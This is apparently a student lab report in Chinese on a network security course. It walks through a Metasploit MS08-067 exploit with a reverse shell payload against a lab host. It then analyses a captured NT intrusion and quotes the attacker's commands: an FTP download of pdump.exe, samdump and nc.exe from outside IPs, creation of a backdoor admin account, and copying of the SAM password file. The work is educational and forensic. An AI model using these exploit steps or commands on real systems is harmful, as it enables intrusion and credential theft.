1.动手实践Metasploit windows attacker
msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
show payloads
set payload generic/shell_reverse_tcp
set RHOST 192.168.200.124
set LHOST 192.168.200.6
exploit
输入ipconfig/all
ip.addr=172.16.1.106 and http
shell ( "cmd /c open 212.139.12.26)shell("cmd /c echo iohna2k>>sasfile)shell ("cmd /c echo haxedj00>>sasfile)shell("cmd /c echo get pdump.exe>>sasfile)shell("cmd /c echo get samdump.dIl>>sasfile)shell ( "cmd /c echo get nc.exe>>sasfile)shell ("cmd /c echo quit>>sasfile)shell ("cmd /c ftp - s : sasfile ")shell ( "cmd /c open 213.116.251.162 ")shell ("cmd /c echo johna2k>>sasfile)shell("cmd /c echo haxedi00>>sasfile)shell ( "cmd /c echo get pdump.exe>>sasfile)shell ( "cmd /c echo get samdump.dil>>sasfile)shell ("cmd /c echo get nc.exe>>sasfile)shell("cmd /c echo quit>>sasfile)第二段和第三段中sasfile为高效读入数据的方式,因此为IP分别为212.139.12.26和213.116.251.162号入了文件,值得注意的是nc.exe文件是一个远程入侵的后门程序,便于下次攻击;
再继续分析msadcs.dll的shell命令,整理如下#注意关键字ProgramFilesshell (" cmd / c C: ProgramFiles CommonFiles system msadc pump.exe > > yay.txt)shell (" cmd / c C: ProgramFiles CommonFiles system made pdump.ex > > yay.txt " )#创建会话写入文件yay.txtshell ("cmd/ c pdump.exe >> c: yay.txt)shell ("cmd / c net session > > yay2.txt ")shell("cmd / c net session > > yay2.txt ")shell("cmd /c net users > > heh.txt")shell("cmd /c net users >> c: heh.txt ")#创建用户组提升自己的访问权限shell ("/ c net localgroup Domain Admin I WAM_ KENNY / ADD " )shell (" / c net user testuser UgotHacked / A D D")shell ( "/ c net localgroup Administrators testuser / A D D" )从上边的shell命令可以看到攻击机进入靶机之后查看了一些系统文件,注意关键字ProgramFiles;然后创建会话写入文件yay.txt,注意到前面有pdump.exe,这是上一步中提到的口令破解文件,因此猜测创建的会话将破解的口令写入文件yay.txt中;
再继续分析msadcs.dll的sthell命令,整理如下:shell("cmd/crdisk-/s")shell("cmd / crdisk -s)shell("cmd / crdisk")shell("cmd/crdisk-/s")shell("cmd / crdisk - s")shell("cmd / crdisk / S -")shell("cmd / crdisk/s-")shell ("cmd / crdisk/s")#试图朋除和拷贝SAM中的数据(删除和拷贝har.txt)shell("cmd / c typec: winnt repair sam.> > C: har.txt )shell("cmd / c delc : inetpub wwwroot har.txt")shell ("cmd/ c delc: inetpub wwwroot har.txt)接下来是要创建了用户组等提升攻击机的访问权限;然后利用磁盛修复工具包中的rdisk工具创建SAM文件副本(SAM文件中可是安全账号管理哦!)可以发现创建的口令来来回回执行了好几次,猜测这个攻击者这步操作不是很顺利?!毕竟是SAM文件!然后是尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件;(5)查看NO.1233的tcp流发现端口6969是木马Gatecrasher、Priority开放的端口。以上的NT分析给了我们提醒如果我们的主机被攻击了怎么办,所以我们需要防范措施如下:
3.团队对抗实践:windows系统远程渗透攻击和分析。我和20212908yxy完成的这项实验
echo . > 20212909ghh.txt
Pa.在攻防的时候,靶机IP改不了Sloua:之前靶机IP设定的固定IP,需要改成动态获取IP
本次实验动手实践了使用msf渗透主机的过程,了解了这个工具的使用,也仔细分析了一次成功的NT系统破解攻击,同时和同学完成了一次简单的网络攻防。